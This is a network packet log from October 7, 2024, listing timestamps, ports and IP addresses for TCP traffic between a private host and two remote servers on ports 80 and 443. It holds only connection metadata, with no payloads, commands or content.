Oct 7, 2024 03:15:45.012372971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012387991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012391090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012402058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012418985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012419939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012434006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012450933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012469053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012474060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012481928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012501955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012521982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012522936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012538910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012554884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012562037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012600899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012687922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012702942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012717962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012742043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012756109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012757063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012770891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012785912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012790918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012809992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012821913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012828112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012841940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012846947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012866020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012881041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012885094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012903929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012921095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012922049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012936115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012948036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.012952089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012965918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012983084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012995958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013031006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013396025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013411999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013453960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013463020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013470888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013498068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013506889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013514042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013539076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013544083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013562918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013567924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013578892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013593912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013606071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013611078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013624907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013647079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013648987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013673067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013674974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013689041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013704062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013704062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013720989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013731003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013753891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013765097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013772964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013787985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013804913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013822079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013832092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013844967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013850927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013863087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013886929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013886929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013902903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013917923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013920069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013936996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013952971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013962030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.013968945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.013984919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014000893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014023066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014024973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014039993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014056921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014065027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014080048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014085054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014096022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014123917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014127970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014143944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014143944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014158964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014177084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014188051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014193058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014209032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014224052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014230013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014239073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014259100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014260054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014287949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014312029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014632940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014787912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014801979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014816046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014832020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014847040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014848948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014867067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014882088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.014883995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014923096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.014942884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015089035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015103102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015129089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015134096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015142918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015156984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015160084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015176058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015181065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015192986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015209913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015225887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015237093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015255928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015279055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015279055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015294075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015309095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015336037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015341997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015351057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015364885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015379906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015382051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015398979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015404940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015448093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015470982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015486956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015501976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015517950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015532970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015548944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015563011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015604973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015738964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015755892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015770912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015788078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015798092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015814066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015830040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015831947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015844107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015861034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015865088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015876055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015892029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015892029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015924931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015964985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015966892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.015979052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015986919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.015994072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.016001940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.016068935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.038427114 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.038460016 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.038510084 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.038578987 CEST	49866	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.039072990 CEST	49866	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.039073944 CEST	49866	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.039096117 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.039108038 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.041770935 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.041836977 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.041913033 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.042224884 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.042248964 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.103363037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103416920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103441954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103458881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103473902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103490114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103506088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103523016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103533030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103579998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103600979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103600979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103643894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103684902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103699923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103715897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103730917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103753090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103794098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103833914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103848934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103863955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103877068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103893995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103902102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103916883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103920937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103941917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103957891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.103965998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.103984118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104006052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104007959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104031086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104033947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104043007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104058027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104068041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104083061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104099989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104118109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104132891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104147911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104150057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104182005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104217052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104507923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104523897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104540110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104562044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104578018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104583979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104602098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104635954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104652882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104655027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104669094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104684114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104686975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104700089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104717016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104723930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104751110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104754925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104768991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104782104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104785919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104801893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104815960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104820013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104832888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104856968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104861021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104876995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104882956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104892015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104909897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104918003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104944944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104947090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104959011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104975939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.104980946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.104990005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105006933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105016947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.105034113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105048895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105063915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.105066061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105081081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105081081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.105097055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105113983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105124950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.105163097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.105170012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105185032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105201006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105216026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105232954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105247974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105264902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105279922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105294943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.105307102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.105319023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.105329990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.105364084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.106802940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.106889963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.411303043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.411303043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:45.417335033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.417377949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.491548061 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.492414951 CEST	49867	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.492448092 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.492871046 CEST	49867	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.492876053 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.514179945 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.515937090 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.515969038 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.516402960 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.516408920 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.524482012 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.525238037 CEST	49869	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.525258064 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.525824070 CEST	49869	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.525830030 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.534811974 CEST	443	49870	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.536267042 CEST	49870	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.536319017 CEST	443	49870	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.536858082 CEST	49870	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.536869049 CEST	443	49870	13.107.246.45	192.168.2.5
